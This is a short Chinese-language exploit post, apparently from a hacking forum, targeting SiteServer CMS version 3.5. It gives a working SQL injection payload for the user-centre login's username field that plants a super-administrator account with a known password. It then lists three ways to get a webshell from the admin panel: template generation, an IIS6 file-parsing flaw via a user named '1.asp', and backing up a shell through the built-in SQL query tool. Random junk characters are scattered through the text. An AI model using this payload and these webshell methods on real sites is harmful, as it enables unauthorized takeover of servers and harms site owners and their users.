经测试秒杀最新的3.5版
" Z2 Z$ p# ]9 p" j- g @; I* S/ G2 j p" @3 \
stieserver官网:www.siteserver.cn
" Z+ p! Z0 K; G3 x; H1 {' E1 ~. g) f w
+ {5 c) u @. B& E
9 N \! `' ^0 a/ M$ R3 x& ~( o+ @EXP:
# ^5 Y! }+ q3 U4 t" T" _$ _0 a1 T0 w# r' O
直接访问UserCenter/login.aspx
1 I3 G i; u4 l3 I) S5 Z U" M+ J2 S% x e. L2 f) ~2 D, _
; e! x% N. @- A; D& }5 Z# V% }, N
; Y4 \; m" W @
用户名处输入:5 p) C8 ]1 a& Y7 e) _+ p( I
+ G3 m+ ?0 x" ]4 _ Z5 P) P$ N
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--% c: B- ?% M6 I# R
+ X; P/ t# I, Y2 r ' |4 {: i& m f0 ? O
6 e. m# i8 p0 Y密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
7 ?7 t1 G" D& c- f
* j, Z8 P. K2 o/ c 4 q9 [6 A7 X: f. W! j
& V" J! p' C) `之后再访问后台SiteServer/login.aspx用插入的用户登陆
* v' Y# q4 K) [8 B, g4 D" u/ r( L1 u8 n5 l
' |* N! P6 k3 F# U0 ^
+ W2 t& ^% T9 Y3 [* v' j3 U4 p$ c
后台拿webshell的三种方法:
6 Y% v1 e8 a" K
5 X' e+ @" ]1 i2 L6 o @4 A4 p2 i一、7 L, @$ F- k; s
' ?% v3 I7 Y R2 w6 K
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx% ]0 x0 }0 F5 Q$ y* w/ s
1 d& z8 \+ i* b+ T" _0 _; N2 B
二、: _( b* d9 q. z% a) x }8 Y# r. K
f1 L4 w# k. V9 @) q4 ?
成员权限-》添加用户-》用户名为:1.asp+ V8 B" \7 ^( t+ e0 s. ~
1 F# {8 K3 w! c! g3 r0 o) U4 c
http://127.0.0.1/usercenter/, W; V8 T2 ]+ G6 i# z9 ?* u2 O- ^
! J$ {/ j2 O: O: A/ A# e用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
7 J! N# O8 g- f+ V4 I" c8 j
, n) a/ `1 E, [, o2 F& j(ps:后台添加用户时不会验证是否含有非法字符). Q! N V- m5 }+ A9 B) Q( R
, f+ Z- x( |* E; e \三、 J- y/ k$ r9 ~# D
- M/ V" k/ g4 n) j系统工具-》实用工具-》机器参数查看# _. z- @5 d7 [0 g
可以看到数据库类型、名称,WEB路径
) I) \: L% H9 \9 s! n5 p# p
( R/ F+ s( F) m系统工具-》数据库工具-》SQL语句查询
: U% }8 s: ^5 Z, B- }* }这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
; l7 T; X- {5 a; `% V2 j& L3 P
3 ?. g `. ]0 ^+ E# q- I |